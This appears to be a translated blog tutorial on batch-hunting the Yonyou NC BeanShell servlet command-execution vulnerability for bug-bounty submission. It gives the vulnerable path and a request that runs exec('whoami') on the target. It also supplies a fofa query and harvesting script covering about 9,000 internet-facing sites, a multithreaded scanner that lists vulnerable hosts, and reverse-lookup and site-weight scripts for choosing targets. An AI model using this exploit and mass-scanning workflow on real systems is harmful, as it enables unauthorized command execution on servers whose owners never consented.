This article covers only vulnerability exploitation and batch hunting.

Before getting into SRC (security response center) work, I had the same question as many fellow researchers: how do the veterans dig vulnerabilities in batches? After two months of crawling through the grind, I have gradually formed some understanding and experience of my own, so I want to share it and trade notes with everyone; please point out anything I got wrong.

A Vulnerability Example

Let's take the Yonyou NC command execution vulnerability disclosed a few days ago as an example:

http://x.x.x.x/servlet//~ic/bsh.servlet.BshServlet

Commands can be executed in the text box.
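Besides the text box, you can drive the servlet directly over HTTP. Below is a minimal verification sketch with requests; note that `bsh.script` is the parameter name commonly reported for this BeanShell test servlet, so treat it as an assumption and confirm against your target, and `x.x.x.x` is a placeholder host:

PYTHON

# Minimal manual verification sketch.
# Assumption: the servlet evaluates a BeanShell script passed in the
# "bsh.script" parameter, as commonly reported for this endpoint.
import requests

target = "http://x.x.x.x"  # placeholder host under test
url = target + "/servlet//~ic/bsh.servlet.BshServlet"
res = requests.get(url, params={"bsh.script": 'exec("whoami")'}, timeout=5)
print(res.status_code)
print(res.text)  # the command output is echoed in the returned page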

Batch Detection of the Vulnerability

Once we know the vulnerability details, we use its fingerprint to search fofa for sites across the country running this system. For Yonyou NC, the fofa search fingerprint is:

app="用友-UFIDA-NC"

We can see there are 9,119 results in total. Next we need to harvest all of those site addresses; for this I recommend fofa-viewer, a fofa collection tool developed by the WgpSec (狼組) security team.

GitHub: https://github.com/wgpsec/fofa_viewer

Then export all the sites into a txt file.
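If you would rather script the collection than use a GUI tool, fofa also exposes a search API. Here is a minimal sketch, assuming you have a valid account email and API key; `qbase64` is the base64-encoded query, and with a single field requested each result comes back as a plain host string:

PYTHON

# Minimal fofa API collection sketch (assumes a valid email/key pair).
import base64
import requests

EMAIL = "you@example.com"   # your fofa account email (placeholder)
KEY = "your_api_key"        # your fofa API key (placeholder)
query = base64.b64encode('app="用友-UFIDA-NC"'.encode()).decode()

res = requests.get(
    "https://fofa.info/api/v1/search/all",
    params={"email": EMAIL, "key": KEY, "qbase64": query,
            "size": 1000, "fields": "host"},
    timeout=10,
).json()

with open("yongyou.txt", "w") as f:
    for host in res.get("results", []):
        # fofa may return a bare host:port; normalize it to a URL
        if not host.startswith("http"):
            host = "http://" + host
        f.write(host + "\n")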

Based on the fingerprint of the Yonyou NC command execution response, we can write a simple multithreaded detection script:

PYTHON

# -*- coding: UTF-8 -*-
# Author: dota_st
# Date: 2021/5/10 9:16
# blog: www.wlhhlc.top
import requests
import threadpool
import os

def exp(url):
    # Vulnerable hosts expose the BeanShell test servlet at this path
    poc = r"""/servlet//~ic/bsh.servlet.BshServlet"""
    url = url + poc
    try:
        res = requests.get(url, timeout=3)
        if "BeanShell" in res.text:
            print("[*] Vulnerable URL: " + url)
            # "用友命令執行列表.txt" = Yonyou command execution result list
            with open("用友命令執行列表.txt", 'a') as f:
                f.write(url + "\n")
    except Exception:
        pass

def multithreading(funcname, params=[], filename="yongyou.txt", pools=10):
    works = []
    with open(filename, "r") as f:
        for i in f:
            func_params = [i.rstrip("\n")] + params
            works.append((func_params, None))
    pool = threadpool.ThreadPool(pools)
    reqs = threadpool.makeRequests(funcname, works)
    [pool.putRequest(req) for req in reqs]
    pool.wait()

def main():
    # Truncate the result file from any previous run
    if os.path.exists("用友命令執行列表.txt"):
        f = open("用友命令執行列表.txt", 'w')
        f.truncate()
    multithreading(exp, [], "yongyou.txt", 10)

if __name__ == '__main__':
    main()

After it finishes running, we get a txt file of all vulnerable sites.

Batch Checking of Domains and Weights

When submitting to vulnerability platforms such as Butian, you can't help noticing a rule: a public-welfare vulnerability submission is only accepted if the site's Baidu weight or mobile weight is at least 1, or its Google weight is at least 3, and Butian takes aizhan's measured weight as the standard:

https://rank.aizhan.com/

First we need to run reverse-IP domain lookups on the collected vulnerability list to establish ownership, so we write a crawler-based batch reverse-lookup script.

It uses two sites, ip138 and aizhan, for the reverse lookups.

Because multithreaded requests get banned, it currently runs single-threaded only.

PYTHON

# -*- coding: UTF-8 -*-
# Author:dota_st
# Date:2021/6/2 22:39
# blog: www.wlhhlc.top
import re, time
import requests
from fake_useragent import UserAgent
from tqdm import tqdm
import os
# ip138 reverse lookup
def ip138_chaxun(ip, ua):
    ip138_headers = {
        'Host': 'site.ip138.com',
        'User-Agent': ua.random,
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Accept-Encoding': 'gzip, deflate, br',
        'Referer': 'https://site.ip138.com/'}
    ip138_url = 'https://site.ip138.com/' + str(ip) + '/'
    try:
        ip138_res = requests.get(url=ip138_url, headers=ip138_headers, timeout=2).text
        # "暫無結果" is the literal "no results" marker on the ip138 page
        if '暫無結果' not in ip138_res:
            # Pattern follows ip138's bound-domain list markup at the time of
            # writing; adjust it if the page layout has changed
            result_site = re.findall(r"""</span><a href="/(.*?)/" target="_blank">""", ip138_res)
            return result_site
    except Exception:
        pass
# aizhan reverse lookup
def aizhan_chaxun(ip, ua):
    aizhan_headers = {
        'Host': 'dns.aizhan.com',
        'User-Agent': ua.random,
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Accept-Encoding': 'gzip, deflate, br',
        'Referer': 'https://dns.aizhan.com/'}
    aizhan_url = 'https://dns.aizhan.com/' + str(ip) + '/'
    try:
        aizhan_r = requests.get(url=aizhan_url, headers=aizhan_headers, timeout=2).text
        # Patterns follow aizhan's result markup at the time of writing:
        # first the count of bound domains, then the domain links themselves
        aizhan_nums = re.findall(r'''<span class="red">(.*?)</span>''', aizhan_r)
        if int(aizhan_nums[0]) > 0:
            aizhan_domains = re.findall(r'''rel="nofollow" target="_blank">(.*?)</a>''', aizhan_r)
            return aizhan_domains
    except Exception:
        pass
def catch_result(i):
    ua_header = UserAgent()
    i = i.strip()
    try:
        # Pull the bare host out of "http://x.x.x.x"
        ip = i.split(':')[1].split('//')[1]
        ip138_result = ip138_chaxun(ip, ua_header)
        aizhan_result = aizhan_chaxun(ip, ua_header)
        time.sleep(1)
        if (ip138_result is not None and ip138_result != []) or \
           (aizhan_result is not None and aizhan_result != []):
            # "ip反查結果.txt" = successful reverse-lookup results
            with open("ip反查結果.txt", 'a') as f:
                result = "[url]:" + i + "   " + "[ip138]:" + str(ip138_result) + "  [aizhan]:" + str(aizhan_result)
                print(result)
                f.write(result + "\n")
        else:
            # "反查失敗列表.txt" = hosts whose reverse lookup failed
            with open("反查失敗列表.txt", 'a') as f:
                f.write(i + "\n")
    except Exception:
        pass
if __name__ == '__main__':
    url_list = open("用友命令執行列表.txt", 'r').readlines()
    # Clear both output files at startup
    if os.path.exists("反查失敗列表.txt"):
        f = open("反查失敗列表.txt", 'w')
        f.truncate()
    if os.path.exists("ip反查結果.txt"):
        f = open("ip反查結果.txt", 'w')
        f.truncate()
    for i in tqdm(url_list):
        catch_result(i)

Run results:

With the resolved domains in hand, the next step is to check their weights. We use aizhan again for the weight check and write another batch script:

PYTHON

# -*- coding: UTF-8 -*-
# Author:dota_st
# Date:2021/6/2 23:39
# blog: www.wlhhlc.top
import re
import threadpool
import urllib.parse
import urllib.request
import ssl
from urllib.error import HTTPError
import time
import tldextract
from fake_useragent import UserAgent
import os
import requests
ssl._create_default_https_context = ssl._create_stdlib_context
bd_mb = []   # sites with Baidu/mobile weight above 0
gg = []      # zero-weight sites, re-checked against Google PR
flag = 0     # 0 = first pass, 1 = retry pass over fail.txt
# Data cleaning
def get_data():
    url_list = open("ip反查結果.txt").readlines()
    with open("domain.txt", 'w') as f:
        for i in url_list:
            i = i.strip()
            # Prefer the ip138 result; fall back to aizhan when ip138 is empty
            res = i.split('[ip138]:')[1].split('[aizhan]')[0].split(",")[0].strip()
            if res == 'None' or res == '[]':
                res = i.split('[aizhan]:')[1].split(",")[0].strip()
            if res != '[]':
                res = re.sub('[\'\[\]]', '', res)
                ext = tldextract.extract(res)
                res1 = i.split('[url]:')[1].split('[ip138]')[0].strip()
                res2 = "http://www." + '.'.join(ext[1:])
                result = '[url]:' + res1 + '\t' + '[domain]:' + res2
                f.write(result + "\n")
def getPc(domain):
    ua_header = UserAgent()
    headers = {
        'Host': 'baidurank.aizhan.com',
        'User-Agent': ua_header.random,
        'Sec-Fetch-Dest': 'document',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
        'Cookie': ''
    }
    aizhan_pc = 'https://baidurank.aizhan.com/api/br?domain={}&style=text'.format(domain)
    try:
        req = urllib.request.Request(aizhan_pc, headers=headers)
        response = urllib.request.urlopen(req,timeout=10)
        b = response.read()
        a = b.decode("utf8")
        # The style=text API wraps the weight value in an <a> tag
        result_pc = re.findall(re.compile(r'>(.*?)</a>'), a)
        pc = result_pc[0]
    except HTTPError as u:
        time.sleep(3)
        return getPc(domain)
    return pc
def getMobile(domain):
    ua_header = UserAgent()
    headers = {
        'Host': 'baidurank.aizhan.com',
        'User-Agent': ua_header.random,
        'Sec-Fetch-Dest': 'document',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
        'Cookie': ''
    }
    aizhan_mobile = 'https://baidurank.aizhan.com/api/mbr?domain={}&style=text'.format(domain)
    try:
        req = urllib.request.Request(aizhan_mobile, headers=headers)
        response = urllib.request.urlopen(req, timeout=10)
        b = response.read()
        a = b.decode("utf8")
        result_m = re.findall(re.compile(r'>(.*?)</a>'), a)
        mobile = result_m[0]
    except HTTPError as u:
        time.sleep(3)
        return getMobile(domain)
    return mobile
# Weight lookup
def seo(domain, url):
    try:
        result_pc = getPc(domain)
        result_mobile = getMobile(domain)
    except Exception:
        if flag == 0:
            print('[!] Target {} failed; written to fail.txt for a retry'.format(url))
            print(domain)
            with open('fail.txt', 'a', encoding='utf-8') as o:
                o.write(url + '\n')
        else:
            print('[!!] Target {} failed on the second attempt'.format(url))
        # Bail out so the undefined results below are never referenced
        return False
    result = '[+] Baidu weight: ' + result_pc + '  mobile weight: ' + result_mobile + '  ' + url
    print(result)
    if result_pc == '0' and result_mobile == '0':
        gg.append(result)
    else:
        bd_mb.append(result)
    return True
def exp(url):
    try:
        main_domain = url.split('[domain]:')[1]
        ext = tldextract.extract(main_domain)
        domain = '.'.join(ext[1:])
        rew = seo(domain, url)
    except Exception as u:
        pass
def multithreading(funcname, params=[], filename="domain.txt", pools=15):
    works = []
    with open(filename, "r") as f:
        for i in f:
            func_params = [i.rstrip("\n")] + params
            works.append((func_params, None))
    pool = threadpool.ThreadPool(pools)
    reqs = threadpool.makeRequests(funcname, works)
    [pool.putRequest(req) for req in reqs]
    pool.wait()
def google_simple(url, j):
    google_pc = "https://pr.aizhan.com/{}/".format(url)
    bz = 0
    http_or_find = 0
    try:
        response = requests.get(google_pc, timeout=10).text
        http_or_find = 1
        # "谷歌PR:" is the literal label on the aizhan page, followed by an
        # <img> tag whose alt attribute carries the PR value
        result_pc = re.findall(re.compile(r'谷歌PR:(.*?)/>'), response)[0]
        result_num = result_pc.split('alt="')[1].split('"')[0].strip()
        if int(result_num) > 0:
            bz = 1
        result = '[+] Google weight: ' + result_num + '  ' + j
        return result, bz
    except Exception:
        if http_or_find != 0:
            result = "[!] Format error: " + j
            return result, bz
        else:
            time.sleep(3)
            return google_simple(url, j)
def exec_function():
    # Truncate (or create) fail.txt before the run
    open("fail.txt", 'w', encoding='utf-8').close()
    multithreading(exp, [], "domain.txt", 15)
    fail_url_list = open("fail.txt", 'r').readlines()
    if len(fail_url_list) > 0:
        print("*" * 12 + "Re-checking failed URLs" + "*" * 12)
        global flag
        flag = 1
        multithreading(exp, [], "fail.txt", 15)
    # "權重列表.txt" = final weight list
    with open("權重列表.txt", 'w', encoding="utf-8") as f:
        for i in bd_mb:
            f.write(i + "\n")
        f.write("\n")
        f.write("-" * 25 + "Google weight check" + "-" * 25 + "\n")
        f.write("\n")
        print("*" * 12 + "Checking Google weights" + "*" * 12)
        for j in gg:
            main_domain = j.split('[domain]:')[1]
            ext = tldextract.extract(main_domain)
            domain = "www." + '.'.join(ext[1:])
            google_result, bz = google_simple(domain, j)
            time.sleep(1)
            print(google_result)
            if bz == 1:
                f.write(google_result + "\n")
    print("Done; the txt files are saved in the current directory")
def main():
    get_data()
    exec_function()
if __name__ == "__main__":
    main()
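A note on how the three scripts chain together: the detection script reads the fofa export yongyou.txt and writes 用友命令執行列表.txt; the reverse-lookup script reads that file and writes ip反查結果.txt; and this weight script cleans ip反查結果.txt into domain.txt before producing the final 權重列表.txt. Run them in that order from the same directory.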

Vulnerability Submission

Finally, take the results and submit the vulnerabilities one by one.

Closing

The scripts in this article are only in a barely-usable state; I will optimize and revise them later. Fellow researchers are welcome to modify them as needed.